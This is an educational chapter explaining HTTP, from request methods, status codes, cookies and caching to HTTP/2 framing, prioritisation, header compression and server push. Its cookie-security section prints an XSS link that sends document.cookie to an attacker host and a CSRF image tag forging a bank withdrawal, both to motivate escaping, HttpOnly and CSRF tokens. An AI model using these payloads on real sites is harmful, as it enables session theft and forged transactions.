

HTTP

Hypertext Transfer Protocol (HTTP) is one of the most widely used application protocols on the Internet; to read this page, you most likely made a few HTTP requests to fetch it. HTTP is a request-response protocol in which clients interact with servers. The most common example of such an interaction is between a browser and an application hosted on some machine. When the user types an address such as http://example.com, an HTTP request is made [1] by the client (the browser) to the server (the application). The server processes the request and returns a response to the client, which contains information about the status of the request (success or failure, for example) and may also carry content if any was requested.

Request methods

The request methods that a client can issue to a server are:

GET: requests a representation of the specified resource.
HEAD: identical to GET, but the server returns only the headers, without a message body.
POST: submits data to be processed by the specified resource.
PUT: stores the enclosed entity under the specified URI.
DELETE: removes the specified resource.
OPTIONS: asks which methods the server supports for the specified resource.
TRACE: echoes the received request back to the client.
CONNECT: establishes a tunnel to the server, typically for TLS through a proxy.
PATCH: applies a partial modification to the resource.

PUT and POST look very similar, but they are not the same thing. The difference is that with POST, the client lets the server decide (according to the resource's semantics) where the new entity should be created, while with PUT, the client states exactly which URI should be used for the resource enclosed in the request.

For example, a POST request could be made as the following:

POST /items

The semantics defined for items would then be used to process the request together with the item information passed in the message payload. This could, for example, result in a new item being created at /items/13. A new, identical request could then result in another item being created at /items/14.

On the other hand, consider a PUT request such as the following:

PUT /items/11

The above request can only affect the resource located at the specified URI. If a resource already exists there, it is modified with the information given in the message payload; if there isn't one, a new resource is created at that URI. A new, identical request would then only modify the existing resource [2] and not create a new one, as the POST example did.
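
As a rough illustration, here is a minimal Python sketch using http.client; the api.example.com host and the /items resource are hypothetical stand-ins:

# Minimal sketch of the POST vs PUT distinction using Python's http.client.
# The host and the /items resource are hypothetical; adjust for a real API.
import http.client
import json

conn = http.client.HTTPConnection("api.example.com")
body = json.dumps({"name": "keyboard", "price": 50})

# POST: the server decides where the new item lives (e.g. /items/13, /items/14, ...).
conn.request("POST", "/items", body, {"Content-Type": "application/json"})
resp = conn.getresponse()
print(resp.status, resp.getheader("Location"))  # e.g. 201 and /items/13
resp.read()  # drain the body so the connection can be reused

# PUT: the client names the exact URI; repeating the request does not create a second item.
conn.request("PUT", "/items/11", body, {"Content-Type": "application/json"})
resp = conn.getresponse()
print(resp.status)  # e.g. 200 (modified) or 201 (created)
resp.read()

conn.close()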

Status codes

Every HTTP response must include a status code indicating the result of the request. Status codes are divided into five categories:

1xx (Informational): the request was received and the process is continuing.
2xx (Successful): the request was successfully received, understood, and accepted.
3xx (Redirection): further action needs to be taken in order to complete the request.
4xx (Client Error): the request contains bad syntax or cannot be fulfilled.
5xx (Server Error): the server failed to fulfill an apparently valid request.

The list below presents some of the most commonly used status codes:

200 (OK): the request succeeded.
201 (Created): the request succeeded and a new resource was created.
204 (No Content): the request succeeded, but there is no content to return.
301 (Moved Permanently): the resource has been assigned a new permanent URI.
302 (Found): the resource temporarily resides under a different URI.
304 (Not Modified): the cached copy held by the client is still valid.
400 (Bad Request): the request could not be understood by the server.
401 (Unauthorized): the request requires authentication.
403 (Forbidden): the server understood the request but refuses to fulfill it.
404 (Not Found): the server could not find the requested resource.
500 (Internal Server Error): the server encountered an unexpected condition.
503 (Service Unavailable): the server is currently unable to handle the request.

Persistent connections

In HTTP/0.9 and HTTP/1.0, the connection is closed after the server sends the response. In HTTP/1.1, a keep-alive mechanism was introduced, so the same connection can be kept open and reused for more than a single request/response pair.

A clear improvement gained with this mechanism is reduced latency, since there is no need to perform a new TCP handshake to set up a connection for every request. Another benefit of keeping the connection alive is that the rate of transmitted segments increases over time, as explained in the TCP section of this text about congestion control.
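
A minimal sketch of connection reuse with Python's http.client, which keeps the underlying TCP connection open between requests (example.com and the /about path are placeholders):

# Both requests below travel over the same TCP connection.
import http.client

conn = http.client.HTTPConnection("example.com")

conn.request("GET", "/")
resp = conn.getresponse()
resp.read()                      # drain the body so the connection can be reused
print("first response:", resp.status)

# No new TCP handshake here: the same connection carries the second request.
conn.request("GET", "/about")
resp = conn.getresponse()
resp.read()
print("second response:", resp.status)

conn.close()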

Session State

HTTP is a stateless protocol, meaning that the server does not retain information or status about each user across multiple request/response pairs. To work around this limitation, web applications generally use HTTP cookies to store and manage state across the request/response cycle.

HTTP Cookies

HTTP cookies are small pieces of data that the server instructs the client to store and to include in future requests. The server sends this information using the Set-Cookie header, as follows:

HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: theme=light

And the client would include this cookie in a future request as follows:

GET /info HTTP/1.1
Host: www.example.org
Cookie: theme=light

Cookies can have other attributes besides their name and value: Expires and Max-Age control how long the cookie is kept, Domain and Path limit the scope in which it is sent, Secure restricts it to encrypted (HTTPS) connections, and HttpOnly hides it from client-side JavaScript.
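
To see how these attributes look when parsed, here is a quick sketch using Python's standard http.cookies module; the cookie name and values are made up:

# Parse a Set-Cookie value carrying several attributes.
from http.cookies import SimpleCookie

jar = SimpleCookie()
jar.load("session_id=38afes7a8; Path=/; Max-Age=3600; Secure; HttpOnly")

morsel = jar["session_id"]
print(morsel.value)          # 38afes7a8
print(morsel["path"])        # /
print(morsel["max-age"])     # 3600
print(jar.output())          # the full Set-Cookie header line the server would send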

Security with Cookies

Cookies are sent with every request to the matching site and are not themselves encrypted, so an attacker could steal them simply by silently listening on the network. Using a secure channel (HTTPS) between client and server resolves this particular issue, but unfortunately it is not the only security issue you need to be aware of when dealing with cookies.

XSS (cross-site scripting) is a technique that can be used to steal cookies from a different domain. In this attack, the attacker takes advantage of a user's trust in a certain website, for example a well-known forum, and places a malicious piece of code such as:

<a href="#" onclick="window.location = 'http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;">Click here!</a>

In this case, when visiting the forum and clicking on this link [3], the cookies for the current website are sent to the attacker's domain.

To mitigate this problem, the HttpOnly attribute can be used so that cookies cannot be accessed through JavaScript. An even better solution is simply not to let users submit code such as the example above: in a forum, for instance, users' messages should be treated as unsafe and escaped accordingly, so that injected markup is rendered harmlessly as text.
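
As a minimal illustration of the escaping approach (assuming a Python backend), user-submitted text can be passed through html.escape before it is embedded in a page:

# Treat user-submitted text as unsafe and escape it before embedding it in HTML,
# so injected markup is displayed as text instead of being executed.
import html

user_message = '<a href="#" onclick="alert(document.cookie)">Click here!</a>'
safe_message = html.escape(user_message)

print(safe_message)
# &lt;a href=&quot;#&quot; onclick=&quot;alert(document.cookie)&quot;&gt;Click here!&lt;/a&gt;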

Cross-site request forgery (CSRF) is another technique that can be used in conjunction with cookies to exploit a user. In CSRF, the attacker exploits the trust a website places in the user's browser and forges a request that the browser will make on the user's behalf. For example, an attacker could place this piece of code as a message on a forum website:

<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">

Assuming the user, Bob, is signed in to the bank website, and the bank uses cookies to authenticate users, the code above would issue a request to the bank along with the cookies for that website. If the bank does not have any other authentication step, the action in question would be executed without the user even knowing.

This type of attack cannot be mitigated with the HttpOnly attribute, but as with XSS, filtering user input helps. Another common mitigation is to use a token, usually called a CSRF token, as a hidden input field in a form: when an action is performed, the website checks the presence and validity of the token before processing the request.
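
A minimal sketch of the token approach, assuming a Python backend and a simplified session dictionary (the helper names are made up for illustration):

# The server stores a random token in the user's session, embeds it in the form as a
# hidden field, and verifies it when the form is submitted.
import secrets
import hmac

def issue_csrf_token(session: dict) -> str:
    """Generate a token, remember it in the session, and return it for the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def verify_csrf_token(session: dict, submitted: str) -> bool:
    """Check the submitted hidden-field value against the session copy."""
    expected = session.get("csrf_token", "")
    # compare_digest avoids leaking information through timing differences
    return bool(expected) and hmac.compare_digest(expected, submitted)

session = {}
token = issue_csrf_token(session)
form_html = f'<input type="hidden" name="csrf_token" value="{token}">'

print(verify_csrf_token(session, token))        # True: legitimate form submission
print(verify_csrf_token(session, "forged"))     # False: request forged from elsewhere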

Headers

Every HTTP request and response can carry several header fields that provide more information about the request context or about the response itself.

Request fields

Some of the most common header fields in a request are the following:

Accept: Content types that are acceptable for the response. Example: Accept: text/plain
Accept-Charset: Character sets that are acceptable for the response. Example: Accept-Charset: utf-8
Accept-Encoding: List of acceptable encodings. Example: Accept-Encoding: gzip, deflate
Accept-Language: List of human languages that are acceptable for the response. Example: Accept-Language: en-US, pt-BR
Cache-Control: Directives that must be obeyed by caches along the request-response chain. Example: Cache-Control: no-cache
Connection: Control options for the current connection. Example: Connection: keep-alive
Cookie: An HTTP cookie previously sent by the server. Example: Cookie: theme=light; session_id=32
Content-Length: The length of the request body in octets. Example: Content-Length: 348
Content-Type: The MIME type of the request body (used with POST and PUT requests). Example: Content-Type: multipart/form-data
Host: The domain name of the server (for virtual hosting), and the TCP port on which the server is listening. Example: Host: en.wikipedia.org:8080
If-Match: Only perform the action if the entity supplied by the client matches the entity on the server. Example: If-Match: "737060cd8c284d8af7ad3082f209582d"
If-Modified-Since: If the resource has not been modified since the specified date, a 304 Not Modified response is returned; otherwise the server transfers the new representation. Example: If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT
If-None-Match: Similar to the field above, but the value is an ETag. Example: If-None-Match: "737060cd8c284d8af7ad3082f209582d"
User-Agent: The user agent string identifying the client. Example: User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)

Response fields

Some of the most common header fields in a response are the following:

Age: The time in seconds the object has spent in a proxy cache. Example: Age: 74505
Cache-Control: Directives that must be obeyed by caches along the request-response chain. Example: Cache-Control: max-age=3600
Connection: Control options for the current connection. Example: Connection: close
Content-Encoding: The type of encoding used in the data. Example: Content-Encoding: gzip
Content-Language: The natural language of the intended audience for the representation. Example: Content-Language: pt-BR
Content-Length: The length of the response body in octets. Example: Content-Length: 26996
Content-Type: The MIME type of the content. Example: Content-Type: text/html; charset=utf-8
ETag: An identifier for a specific version of a resource, often a message digest. Example: ETag: "737060cd8c284d8af7ad3082f209582d"
Expires: Gives the date/time after which the response is considered stale. Example: Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: The last modified date for the requested object. Example: Last-Modified: Wed, 28 Sep 2016 02:28:20 GMT
Location: Used in redirection, or when a new resource has been created (see the 303 status code). Example: Location: http://www.w3.org/pub/WWW/People.html
Server: A name for the server. Example: Server: Apache/2.4.1 (Unix)
Set-Cookie: An HTTP cookie. Example: Set-Cookie: UserID=JohnDoe; Max-Age=3600; Version=1

HTTP Caching

HTTP caching can be done in a couple of ways, using different header fields depending on the desired cache strategy.

Expiration

The server can control the cache policy applied by caching mechanisms along the request/response cycle. The Cache-Control header field is used for this purpose and supports many directives, such as max-age (how long the response may be reused), public and private (whether shared caches may store it), no-cache (the cached copy must be revalidated before use), and no-store (the response must not be stored at all).

The client can also specify rules using Cache-Control directives. In this case, it instructs caches along the way about what the client is willing to accept as a valid response. For example, if a client issues a request with Cache-Control: max-age=60, it will accept any response whose age is no greater than 60 seconds.

Validation

ETags can be used to validate whether cached responses are still fresh. A client can send a request with the If-None-Match header set to the ETag value the server sent in a previous response. When the server receives this request, it can check whether the resource has been modified by comparing the ETag values; if they are the same, it can simply return a 304 Not Modified response, which carries no payload data since the copy the client has is still valid, saving time and bandwidth.

Another way to check whether a cached response is still fresh is the If-Modified-Since header. In this case, the client makes a request carrying the date the resource was last modified (as reported by Last-Modified), and the same mechanism used with ETags applies: if there were no changes, a 304 Not Modified is returned; otherwise, the new resource data is sent.
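
As a sketch of the validation flow using Python's http.client (example.com stands in for a server that returns ETags):

# First request records the ETag; the second sends it back in If-None-Match and may
# receive a 304, in which case the locally cached body can be reused.
import http.client

conn = http.client.HTTPConnection("example.com")

conn.request("GET", "/")
resp = conn.getresponse()
body = resp.read()
etag = resp.getheader("ETag")
print("first request:", resp.status, "ETag:", etag)

if etag:
    # Revalidate the cached copy instead of downloading it again.
    conn.request("GET", "/", headers={"If-None-Match": etag})
    resp = conn.getresponse()
    resp.read()
    if resp.status == 304:
        print("cached copy is still fresh; reuse", len(body), "bytes already stored")
    else:
        print("resource changed; got a new representation:", resp.status)

conn.close()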

Message Format

Clients and servers communicate by sending plain-text messages.

Request message

The syntax for the request message is a request line (containing the method, the request target, and the HTTP version), followed by zero or more header fields, an empty line, and an optional message body.

A simplified example of a request is the following:

POST /profile HTTP/1.1
Host: some-host.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8,pt;q=0.6
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

user=jovem&age=21
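
Because the message really is plain text, the same kind of request can be written by hand to a TCP socket; the following Python sketch uses example.com as a stand-in server:

# Build a raw HTTP/1.1 request, send it over a plain TCP socket, and read the reply.
import socket

request = (
    "GET / HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "Connection: close\r\n"
    "\r\n"
)

with socket.create_connection(("example.com", 80)) as sock:
    sock.sendall(request.encode("ascii"))
    response = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        response += chunk

print(response.decode("iso-8859-1").split("\r\n")[0])  # e.g. HTTP/1.1 200 OK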

Response message

The syntax for the response message is a status line (containing the HTTP version, the status code, and the reason phrase), followed by zero or more header fields, an empty line, and an optional message body.

A simplified example of a response is the following:

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://www.google.com.br/index.html?gfe_rd=cr&ei=3oPtV-_QLIeq8wfS74LoAw
Content-Length: 272
Date: Thu, 29 Sep 2016 21:13:02 GMT

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com.br/index.html?gfe_rd=cr&amp;ei=3oPtV-_QLIeq8wfS74LoAw">here</A>.
</BODY></HTML>

HTTP/2

HTTP/2 is the new version of the protocol, intended to improve transport performance, enabling both lower latency and higher throughput. Applications are not required to make semantic changes, since the protocol keeps compatibility with HTTP/1.1's core concepts, such as methods, status codes, and header fields. Servers are the pieces that require changes in order to understand and serve content via HTTP/2.

Optimization in HTTP/1.1

Most of the optimization techniques used with HTTP/1.1 revolved around minimizing the number of HTTP requests to the end server. A browser usually opens only about six TCP connections to the same domain, so downloading assets can become a serial process; some sites therefore started sharding their assets across several domains, so the browser would open that many connections for each of those domains. Another trick was to combine several assets into a single file, e.g., image spriting and asset concatenation. Inlining is yet another trick used to avoid fetching individual images with separate requests: the resource is embedded in the document itself.

HTTP/2 design

HTTP/2 was designed to enable more efficient use of network resources, and several of the techniques presented above simply aren't needed with HTTP/2, because it natively supports the use cases those techniques were hacked together to address.

A common problem with HTTP/1.1 is what is called head-of-line blocking. With HTTP pipelining, the client could dispatch several requests to the server, but the server was only allowed to send back responses in order, one at a time; if the first request took long enough to produce a response, the responses for the others were blocked behind it.

The model used in HTTP/2 removes this limitation, enabling full request and response multiplexing over a single TCP connection. This is possible because client and server break an HTTP request (or response) into independent frames that can be interleaved during transmission and are reassembled at the other end before being delivered to the application for processing.
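
The following toy Python sketch (not the real HTTP/2 framing layer) illustrates the idea: two messages are split into frames tagged with a stream identifier, interleaved on the "wire", and reassembled per stream at the other end:

# Toy illustration of framing and multiplexing; real HTTP/2 frames are binary and
# carry typed headers, flags, and lengths.
from collections import defaultdict
from itertools import chain, zip_longest

def to_frames(stream_id, payload, frame_size=4):
    """Split a message into (stream_id, chunk) frames."""
    return [(stream_id, payload[i:i + frame_size])
            for i in range(0, len(payload), frame_size)]

stream_1 = to_frames(1, "response for /index.html")
stream_3 = to_frames(3, "response for /style.css")

# Interleave frames from both streams over the "single connection".
wire = [f for f in chain.from_iterable(zip_longest(stream_1, stream_3)) if f is not None]

# The receiving side groups frames by stream id and reassembles each message.
reassembled = defaultdict(str)
for stream_id, chunk in wire:
    reassembled[stream_id] += chunk

print(reassembled[1])  # response for /index.html
print(reassembled[3])  # response for /style.css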

Before we continue to explain how HTTP/2 actually works, let's first define some terms that will be used in the rest of this section. First, HTTP/2 is a binary protocol: everything sent and received is in binary format, not in plain text as in HTTP/1.x. Now, the terms:

Frame: the smallest unit of communication in HTTP/2; each frame carries a header that, among other things, identifies the stream it belongs to.
Message: a complete sequence of frames that maps to a logical request or response.
Stream: a bidirectional flow of bytes within an established connection, which may carry one or more messages.

There are some important details to keep in mind: all communication happens over a single TCP connection that can carry any number of streams, each stream has a unique identifier and optional priority information, and frames from different streams may be interleaved on the wire, since the stream identifier in each frame header is enough to reassemble them.

Request and Response Multiplexing

In HTTP/1.x, if the client wanted to make multiple parallel requests to the server, it needed multiple TCP connections. In HTTP/2, with the binary framing model, this is no longer required: multiple requests (and responses) can be issued over a single TCP connection, with their frames interleaved and reassembled at the other end.

[Figure: frames from multiple streams interleaved over a single connection]

The image above illustrates this feature: multiple streams, representing different requests and responses, are transmitted over the same connection. This ability to multiplex requests and responses brings several benefits, including the elimination of head-of-line blocking at the HTTP level, the use of a single connection per origin, and lower page load times.

If you are familiar with the congestion control mechanisms used by TCP, you will recognize that by using a single connection, HTTP/2 can exploit these mechanisms much better. Contrast this with the workaround in HTTP/1.x, where a client opened multiple TCP connections at a time: each connection operates on its own congestion-control state, not knowing that the same origin is sending far more packets than any individual connection is aware of, which can itself contribute to congestion in the network.

Stream Priority

A client can assign a priority to a new stream by including prioritization information (a weight) in the HEADERS frame. The client can also mark some streams as dependent on others, creating a sort of "prioritization tree". The server can take this prioritization information into consideration when allocating resources for concurrent streams.

The stream identified by * is called the implicit stream. Any stream that does not depend on another stream has a dependency on this implicit (and non-existent) stream, which is used as the root of the tree.

In (A) there are two streams that are independent but have different weights. The server allocates resources to them by dividing each stream's weight by the sum of the weights of all its siblings; in this case, each stream receives weight / (weight of A + weight of B) of the resources.

This means that stream A would get 75% of the resources while stream B would get 25%. Applying the same rule in (D) results in streams E and C each receiving 50% of the resources.
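
The rule is easy to express in code. The sketch below is illustrative only; the weights 12 and 4 are assumed values that reproduce the 75%/25% split mentioned above (any 3:1 ratio would do), and equal weights reproduce the 50%/50% case:

# Each sibling stream's share is its weight divided by the sum of the siblings' weights.
def resource_shares(weights: dict) -> dict:
    """Map sibling stream names to the fraction of resources each should receive."""
    total = sum(weights.values())
    return {stream: weight / total for stream, weight in weights.items()}

# Assumed weights 12 and 4, consistent with the 75%/25% example above (case (A)):
print(resource_shares({"A": 12, "B": 4}))   # {'A': 0.75, 'B': 0.25}

# Any equal weights split the resources evenly (case (D)); 8 is an arbitrary choice:
print(resource_shares({"E": 8, "C": 8}))    # {'E': 0.5, 'C': 0.5}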

The prioritization information should only be thought of as a suggestion about what is more important; it is not a guarantee that a frame with higher priority will be processed or transmitted before a frame with lower priority. For example, in (B) the client indicates that stream C depends on stream D, so resources should be allocated first to stream D and then to stream C. That is only a suggestion: it does not guarantee that stream D will receive its full allocation before stream C gets some.

Clients can improve their performance by using this feature. Imagine a browser requesting a page: the document itself can be marked with a higher priority than other resources, and the remaining resources can be requested with priorities relative to their position in the document, so images at the bottom of a page get lower priority than elements located higher up.

This prioritization is also dynamic, meaning that the client can change it at any time by sending a PRIORITY frame indicating the new information.

Header compression

In HTTP/1.x the header fields are exchanged in plain text, adding quite a bit of overhead per transfer. To reduce the amount of data transferred just for headers, HTTP/2 compresses request and response header metadata with a compression format called HPACK.

HPACK uses Huffman coding to compress the fields. A further optimization is achieved by maintaining a static table and a dynamic table of HTTP header fields that frames can reference. Each side maintains both tables: the static table is defined in the protocol specification and contains common header fields that are very likely to be used on all connections, while the dynamic table, initially empty, is updated as client and server exchange frames.

When a header field is present in the static table, a frame can simply reference it by the corresponding index in the table. If the field is not present in the static table, the first request sends the (compressed) field, and the field is inserted into the dynamic table. Any future request using the same field then doesn't need to retransmit it; it can simply send the corresponding index, reducing the size of requests and responses.
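
The following toy Python sketch illustrates the table-lookup idea only; it is not HPACK itself, and the table contents and indices do not match the real specification:

# A static table holds very common header fields, a dynamic table learns fields as
# they are first sent, and later frames can transmit a small index instead of the field.
STATIC_TABLE = [(":method", "GET"), (":path", "/"), ("accept-encoding", "gzip, deflate")]

class HeaderTable:
    def __init__(self):
        self.dynamic = []

    def encode(self, field):
        """Return an index if the field is known, otherwise the literal field."""
        table = STATIC_TABLE + self.dynamic
        if field in table:
            return ("index", table.index(field))
        self.dynamic.append(field)          # remember it for later requests
        return ("literal", field)

encoder = HeaderTable()
print(encoder.encode((":method", "GET")))            # ('index', 0): already in the static table
print(encoder.encode(("user-agent", "my-browser")))  # ('literal', ...): sent once in full
print(encoder.encode(("user-agent", "my-browser")))  # ('index', 3): now just an index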

Flow Control

Similar to TCP, HTTP/2 also provides flow control. This is helpful so that different streams in the same connection do not destructively interfere with each other. Flow control in HTTP/2 is applied both to individual streams and to the connection as a whole. Its main characteristics are that it is directional and credit-based (the receiver advertises a window and replenishes it with WINDOW_UPDATE frames, and the sender may not exceed it), it is applied hop-by-hop rather than end-to-end, and it cannot be disabled.

An example of flow-control usage would be a server sitting between the client and a web application that is experiencing problems and cannot process much data at the moment. The server could either buffer large amounts of data coming from the client, or simply tell the client to stop (or slow down) sending data, using the flow control mechanism present in HTTP/2.

An example of a client using flow control would be a browser displaying a page with a video, where the user pauses the video or switches to another tab. In this case, the browser can stop enlarging its receive window (by withholding WINDOW_UPDATE frames), so the server must stop sending once the remaining window is exhausted; the browser avoids buffering data the user is not even consuming. Later, when the video is resumed, the browser can send WINDOW_UPDATE frames to open the window again, and the server can resume sending more data.
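
A toy Python sketch of the credit-based idea (real HTTP/2 keeps one window per stream plus one for the whole connection; the class and numbers here are illustrative):

# The receiver advertises a window, the sender consumes it as it sends data, and a
# WINDOW_UPDATE replenishes it.
class FlowControlledSender:
    def __init__(self, initial_window: int):
        self.window = initial_window

    def send(self, data: bytes) -> int:
        """Send at most as many bytes as the current window allows."""
        allowed = min(len(data), self.window)
        self.window -= allowed
        return allowed

    def window_update(self, increment: int):
        """Receiver granted more credit (a WINDOW_UPDATE frame)."""
        self.window += increment

sender = FlowControlledSender(initial_window=10)
print(sender.send(b"x" * 8))   # 8  -> window shrinks to 2
print(sender.send(b"x" * 8))   # 2  -> the paused receiver is not overwhelmed
sender.window_update(16)       # e.g. the user resumed the video
print(sender.send(b"x" * 8))   # 8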

Server Push

HTTP/2 allows a server to send multiple responses to a client for a single original request. For example, the client requests the document /index.html, and the server knows that the client will also need logo.png, style.css, and so on. Instead of waiting for the client to issue requests for these resources, the server can push them immediately.

The way this works is that the server sends a PUSH_PROMISE frame that identifies the original request that caused the server to initiate the push, along with information such as the path of the promised resource, so the client knows it doesn't need to request that resource itself. After the PUSH_PROMISE is sent, the server may send the actual data for the resource it promised.

Pushed resources have some notable characteristics: they can be cached by the client, reused across different pages, multiplexed alongside other resources, prioritized by the server, and declined by the client (for example, if the client already has the resource in its cache).

Another important characteristic is that the server must be authoritative for the resource it is trying to push.


Notes


  1. Assuming DNS resolution for the domain in question.

  2. Because the request is identical, it would not modify the resource, since the information is the same (unless some other request was made between the two).

  3. The attacker could also simply add a script tag with malicious code to send the user's cookies.